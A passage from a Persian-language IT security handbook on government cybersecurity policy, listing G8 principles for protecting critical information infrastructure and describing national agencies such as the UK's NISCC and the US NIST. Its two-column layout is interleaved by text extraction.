‫‪ Protection Handbook‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﻣﺮﻛـﺰ‬
‫‪15‬‬ ‫‪Best Practices‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬ ‫‪۱۶‬‬ ‫ﻣﻄﺎﻟﻌﺎﺕ ﺍﻣﻨﻴﺖ ﻭ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺪﺍﺧﻞ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﺩﻭﻟـﺖ ﺳـﻮﺋﻴﺲ‬
‫‪http://www.cybersecuritycooperation.org/docu‬‬ ‫ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪ments/G8_CIIP_Principles.pdf‬‬ ‫‪http://www.isn.ethz.ch/crn‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٣٤‬‬

‫ﺧﺼﻮﺻﻴﺖ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺍﺧﻠـﻲ‬ ‫ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﺗﺎ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨـﺪ ﻛـﻪ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ‬
‫ﻣﻴﺎﻥ ﺑﺨﺸﻬﺎ ‪ -‬ﺷﺎﻣﻞ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣـﺸﺎﺑﻪ ﻭ‬ ‫ﺍﺿــﻄﺮﺍﺭﻱ ﻫﻤﭽﻨــﺎﻥ ﺍﻣــﻦ ﻭ ﭘﺎﻳــﺪﺍﺭ ﺑــﺎﻗﻲ ﻣــﻲﻣﺎﻧﻨــﺪ ﻭ‬
‫ﻫﻤﺎﻧﻨﺪ ‪ -‬ﻭ ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ ﺍﺭﺗﺒـﺎﻃﻲ ﻣـﺸﺘﺮﻙ ﺍﺳـﺖ‪.‬‬ ‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﻭﻟﺘﻬﺎ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﻨـﺪ ﻛـﻪ ﺿـﺎﻣﻦ‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ ﻛﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺭ ﺩﺳـﺘﺮﺱ‬ ‫‪.۶‬‬
‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣـﺮﺗﺒﻂ‬
‫ﺑﻮﺩﻥ ﺩﺍﺩﻩ‪ ،١٧‬ﺍﻣﻨﻴﺖ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺱ ﺭﺍ‬
‫ﺑﺎ ﮔﺮﻭﻫﻬﺎﻱ ﺯﻳﺮﺳﺎﺧﺘﻲ ﺑﺎﺷﻨﺪ‪ .‬ﻣﻲﺗـﻮﺍﻥ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺎ ﺍﻧﺘﺨـﺎﺏ‬
‫ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻧﺪ‪.‬‬
‫ﻳﻚ ﻣﺮﻛﺰ ﺭﺍﻫﺒﺮﻱ ﺩﺭ ﺩﻭﻟﺖ ﺑـﺮﺍﻱ ﻫﻤﺎﻫﻨـﮓﺳـﺎﺯﻱ ﻣﺘﻤﺮﻛـﺰ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻋﻤﻠـﻲ ﻛـﺮﺩ ﻭ ﻣـﺎ ﻧﻴـﺰ ﺩﺭ‬ ‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺭﺩﻳـﺎﺑﻲ ﺣﻤـﻼﺕ ﺑـﻪ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻬـﻢ‬ ‫‪.۷‬‬
‫ﺍﺩﺍﻣﺔ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ‪.‬‬ ‫ﺍﻃﻼﻋــﺎﺗﻲ ﺭﺍ ﺗــﺴﻬﻴﻞ ﺑﺨــﺸﻴﺪﻩ ﻭ ﺩﺭ ﺯﻣــﺎﻥ ﻣﻨﺎﺳــﺐ‪،‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﻳﻦ ﺭﺩﻳﺎﺑﻲ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺘﻘﺎﺿـﻲ‬
‫ﻣﻨﺘﺸﺮ ﺳﺎﺯﻧﺪ‪.‬‬
‫ﻛــﺸﻮﺭﻫﺎ ﺑﺎﻳــﺪ ﺩﺭ ﺧــﺼﻮﺹ ﺍﻓــﺰﺍﻳﺶ ﻗﺎﺑﻠﻴــﺖ ﻭﺍﻛــﻨﺶ‪،‬‬ ‫‪.۸‬‬
‫ﺁﻣﻮﺯﺷﻬﺎ ﻭ ﺗﻤﺮﻳﻨﺎﺗﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﭘﻴﺸﺎﻣﺪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭ ﺯﻣﺎﻥ ﻭﻗـﻮﻉ ﺣﻤﻠـﻪ ﻣـﻮﺭﺩ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﻭ ﻫﻤﮕـﺎﻥ ﺭﺍ ﻧﻴـﺰ ﺗـﺸﻮﻳﻖ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺯﻧﺪ‪.‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻨﺪ ﻛﻪ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ‬ ‫‪.۹‬‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻣﻨﺎﺳﺐ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ‬
‫ﺩﺍﺭﻧﺪ ﻭ ﺍﻳﻦ ﺗﺤﻘﻴﻘﺎﺕ ﺭﺍ ﺑﺎ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﺑﻪ ﻧﺤﻮ ﺍﺣـﺴﻦ‬
‫ﻣﻄﺎﺑﻘــﺖ ﺩﻫﻨــﺪ ‪ -‬ﻣﺎﻧﻨــﺪ ﻗــﻮﺍﻧﻴﻨﻲ ﻛــﻪ ﺩﺭ ﻛﻨﻮﺍﻧــﺴﻴﻮﻥ‬
‫ﺗﺨﻠﻔﺎﺕ ﺳﺎﻳﺒﺮ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ‪ ١٨‬ﺩﺭ ﻧـﻮﺍﻣﺒﺮ ﺳـﺎﻝ ‪۲۰۰۱‬‬
‫ﺗﺼﻮﻳﺐ ﺷﺪ ﻭ ﭘﺮﺳﻨﻞ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻱ ﺭﺍ ﺁﻣﺎﺩﺓ ﺍﺭﺯﻳﺎﺑﻲ ﻭ‬
‫ﺭﺩﻳﺎﺑﻲ ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺑﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺣﺴﺎﺱ ﻧﻤﻮﺩ‪.‬‬
‫‪ .۱۰‬ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬
‫ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ﺗﺎ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﻬﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ ﺭﺍ‬
‫ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺍﻣـﺮ ﺷـﺎﻣﻞ ﺗﺄﺳـﻴﺲ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻫﺸﺪﺍﺭﺩﻫﻨﺪﺓ ﺍﺿﻄﺮﺍﺭﻱ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﻭ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ ﺑـﺮ‬
‫ﺍﺳﺎﺱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺭﺧﺪﺍﺩﻫﺎ‪ ،‬ﻭ ﻧﻴﺰ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﻣﻮﺭﺩ‬
‫ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻭ ﺍﻟﺒﺘﻪ ﺑـﺎ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻗﻮﺍﻧﻴﻦ ﻣﺤﻠﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪ .۱۱‬ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺗﺤﻘﻴﻖ ﻭ ﺗﻮﺳﻌﺔ ﻣﻠﻲ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺧـﻮﺩ ﺭﺍ‬
‫ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ‪،‬‬
‫ﻣﺸﻮﻕ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺷﻨﺪ‪.‬‬

‫‪17‬‬ ‫‪Data Availability‬‬


‫‪18‬‬ ‫‪Council of Europe Cybercrime Convention‬‬
‫‪٢٣٥‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﺭﻭﺑﺮﻭ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺩﻭﻟﺖ ﺑﺎﻳـﺪ ﺍﺑﺘـﺪﺍ ﺑـﻪ‬


‫ﺍﻳﻦ ﭘﺮﺳﺶ ﭘﺎﺳﺦ ﺩﺍﺩ ﻛﻪ‪ :‬ﺁﻳﺎ ﺍﺯ ﻧﻈﺮ ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﻳﺎ‬
‫ﻣﻘﺮﺭﺍﺕ ﺣﺎﻛﻢ‪ ،‬ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﻳـﻚ ﻣـﺴﺌﻠﻪ ﻗﺎﺑـﻞ ﺍﻫﻤﻴـﺖ‬
‫ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ؟‬
‫ﻓﺼﻞ ﺩﻭﻡ‬
‫ﺑﺮﺍﻱ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﺑﺪ ﻧﻴﺴﺖ ﺑﺪﺍﻧﻴﻢ‪:‬‬
‫ﻛﺎﻧﺎﺩﺍ ﺍﻋﺘﺒﺎﺭﺍﺕ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‪ ٢٠‬ﺑـﻪ ﻭﺯﺍﺭﺕ‬ ‫•‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫‪٢١‬‬
‫ﺩﻓﺎﻉ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﺗﻤﺎﻣﻲ ﻣﻮﺿﻮﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﺑـﺰﺭﮒ‬
‫ﺩﺭ ﺑﺮﻳﺘﺎﻧﻴﺎ‪ ،‬ﺍﺩﺍﺭﺓ ﺍﻗﺎﻣﺖ‪ ٢٢‬ﻛﻪ ﻣﺴﺌﻮﻝ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺳﺖ‬ ‫•‬ ‫)‪SME‬ﻫــﺎ( ﺩﺭ ﺑﺨــﺶ ﺳــﻮﻡ ﻣــﻮﺭﺩ ﻣﻄﺎﻟﻌــﻪ ﻗــﺮﺍﺭ ﺩﺍﺩﻳــﻢ ﺩﺭ‬
‫‪٢٣‬‬
‫ﺭﻫﺒﺮﻱ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪.‬‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﻫـﺴﺘﻨﺪ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ‬
‫ﺷـــﺮﻛﺘﻬﺎ ﻧﻴﺎﺯﻣﻨـــﺪ ﻣﺤﺎﻓﻈـــﺖ ﺍﺯ ﺧـــﻮﺩ‪ ،‬ﺗﻬﻴـــﻪﻛﻨﻨـــﺪﮔﺎﻥ ﻭ‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺭﺍ ﺩﺭ ﺑﺨـﺶ ﺍﻣﻨﻴـﺖ ﺩﺍﺧﻠـﻲ‬ ‫•‬
‫ﻣــﺼﺮﻑﻛﻨﻨــﺪﮔﺎﻥ ﻫــﺴﺘﻨﺪ‪ ،‬ﺩﻭﻟــﺖ ﻧﻴــﺰ ﺑﺎﻳــﺪ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ‬
‫ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺗﻌﻤﺪﹰﺍ ﻭ ﺑﺼﻮﺭﺕ ﺁﮔﺎﻫﺎﻧﻪ ﺑﺨـﺶ‬ ‫ﺷﻬﺮﻭﻧﺪﺍﻥ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﻭ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ‪ ٢٤‬ﺗﺤﺖ‬
‫‪٢٥‬‬
‫ﺳﺎﻳﺒﺮ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳـﺪ‪ .‬ﺩﻭﻟﺘﻬـﺎﻱ ﻣﺤﻠـﻲ ﻭ ﻣﻠـﻲ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻧﻈﺎﺭﺕ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺗﺠﺎﺭﺕ ﺭﺍ ﻫﻤﭽﻨﺎﻥ ﺣﻔﻆ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﺟﻠﻮﻱ ﺑﺤﺮﺍﻧﻬﺎﻱ ﺷﺪﻳﺪ ﻣﺜﻞ ﻭﻗﻮﻉ ﻭﻗﻔﻪ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪،‬‬
‫ﺍﺳﺘﺮﺍﻟﻴﺎ ﻳﻚ ﮔﺮﻭﻩ ﻫﻤﻜﺎﺭﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑـﺮﺍﻱ‬ ‫•‬ ‫ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﻳﺎ ﺳﺮﻗﺖ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ‬
‫ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﺍﻳﺠـﺎﺩ ﻧﻤـﻮﺩﻩ ‪-‬‬ ‫ﺑﮕﻴﺮﻧﺪ‪ .‬ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ ﺑﺎﻋـﺚ‬
‫ﻛﺎﻫﺶ ﺍﻋﺘﻤﺎﺩ ﻣﺮﺩﻡ ﻣﻲﺷﻮﺩ ﻭ ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﺎﻧﻌﻲ ﺑﺮﺍﻱ ﭘﻴـﺸﺮﻓﺖ‬
‫‪20‬‬ ‫‪Cyber-Security‬‬ ‫ﺍﻗﺪﺍﻣﺎﺕ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ١٩‬ﻣﻲﮔﺮﺩﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ‬
‫ﺩﻓﺘﺮ "ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭ ﺁﻣـﺎﺩﮔﻲ ﺷـﺮﺍﻳﻂ ﺍﺿـﻄﺮﺍﺭﻱ"‬ ‫‪۲۱‬‬ ‫ﻻ ﺍﻭﻟـﻴﻦ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﻭﻟـﺖ ﺩﺭ‬ ‫ﺩﺭ ﻓﺼﻞ ﻗﺒﻞ ﺍﺷﺎﺭﻩ ﺷﺪ‪ ،‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﻛﺎﻧﺎﺩﺍ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﺪﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﻣﻠﻲ ﻓﻌﺎﻟﻴﺖ ﻣـﻲ‪-‬‬


‫ﻛﻨﺪ‪.‬‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻫﻤﺎﻥ "ﺗﻨﻈﻴﻢ ﺍﻣـﻮﺭ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺧـﻮﺩ" ﺁﻥ ﺍﺳـﺖ؛‬
‫‪22‬‬ ‫‪Home Office‬‬ ‫ﺑﺪﻳﻦ ﻣﻌﻨـﺎ ﻛـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺗﻤـﺎﻣﻲ ﺳـﻄﻮﺡ )ﻣﻠـﻲ‪،‬‬
‫ﺍﺩﺍﺭﺓ ﺍﻗﺎﻣﺖ ﺍﻧﮕﻠﺴﺘﺎﻥ ﻳﻚ ﻣﺮﻛﺰ ﺯﻳﺮﺳﺎﺧﺘﻲ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻠـﻲ‬ ‫‪۲۳‬‬
‫)‪ (NISCC‬ﺗﺄﺳﻴﺲ ﻛﺮﺩﻩ ﻛﻪ ﺩﺭ ﻣﺴﺎﺋﻞ ﺣﻴﺎﺗﻲ ﺍﻣﻨﻴﺖ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﻛﺎﺭ‬
‫ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﻣﺤﻠـﻲ( ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ‬
‫ﻛﻨﺪ‪ ،‬ﻫﺸﺪﺍﺭﻫﺎ ﻭ ﻭﺍﻛﻨـﺸﻬﺎﻱ ﻛﻤﻜـﻲ ﻻﺯﻡ ﺭﺍ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳـﺪ‪ ،‬ﻭ ﺭﻭﺍﺑـﻂ‬ ‫ﺁﻧﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺣﻔﺎﻇﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻧﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺳﺎﺩﻩﺗﺮ ﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﻳﺎ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﺍﺯ‬
‫ﺩﺭ ‪ NISCC‬ﻳــﻚ ﻣﺮﻛــﺰ ﻓﻮﺭﻳﺘﻬــﺎﻱ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﻪ ﻧــﺎﻡ‬
‫‪ UNIRAS‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻳـﻚ ﺗـﻴﻢ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺣﻤـﻼﺕ‬
‫ﺟﻤﻠﻪ ﻧﻴﺮﻭﻫـﺎﻱ ﻧﻈـﺎﻣﻲ ﻭ ﺍﻧﺘﻈـﺎﻣﻲ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻬﺪﺍﺷـﺖ ﻭ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪ (EARG‬ﺩﺭ ‪ NISCC‬ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺗـﺎ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬ ‫ﺳﻼﻣﺖ ﻋﻤﻮﻣﻲ‪ ،‬ﻣﺮﺍﻛـﺰ ﻭﺍﻛﻨـﺸﻬﺎﻱ ﺍﺿـﻄﺮﺍﺭﻱ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺣﺎﻭﻱ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭ ﺑﺨﺸﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺍﺯ ﺣﻤـﻼﺕ ﺁﺳـﻴﺐ‬ ‫ﺑﺎﻧﻜﻬﺎﻱ ﻣﺮﻛﺰﻱ ﻣﻲﺷﻮﺩ‪ .‬ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺩﻭﻟـﺖ ﻛـﻪ‬
‫ﻣﻲﺑﻴﻨﻨﺪ ﻛﻤﻚ ﻛﻨﺪ‪ UNIRAS .‬ﺑﻌﺪ ﺍﺯ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﺣﻤﻼﺕ‪،‬‬
‫ﺑﻪ ﺗﻤﺎﻡ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺍﻧﮕﻠـﺴﺘﺎﻥ ﻫـﺸﺪﺍﺭ ﻣـﻲﺩﻫـﺪ‪ .‬ﺑـﺮﺍﻱ‬
‫ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻱ ﺩﻭﻟﺘـﻲ ﻭ ﭼـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻫﺒﺮﺩ ﺩﻭﻟﺖ ﺍﻧﮕﻠﺴﺘﺎﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ‬ ‫ﭼﻴﺰﻱ ﺧﺼﻮﺻﻲ ﻣﺤﺴﻮﺏ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻭﺏ ‪ NISCC‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬ ‫ﺁﺑﻲ‪ ،‬ﺳﺪﻫﺎﻱ ﻫﻴـﺪﺭﻭﺍﻟﻜﺘﺮﻳﻜﻲ‪ ،‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﻨﺘـﺮﻝ ﺗﺮﺍﻓﻴـﻚ‬
‫‪http://www.niscc.gov.uk‬‬
‫‪24‬‬ ‫‪Computer Security Division of the National‬‬ ‫ﻫﻮﺍﻳﻲ ﻭ ﺳﺎﻳﺮ ﺍﻣﻜﺎﻧﺎﺕ ﻭ ﺗﺴﻬﻴﻼﺕ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪Institute of Standards & Technology‬‬
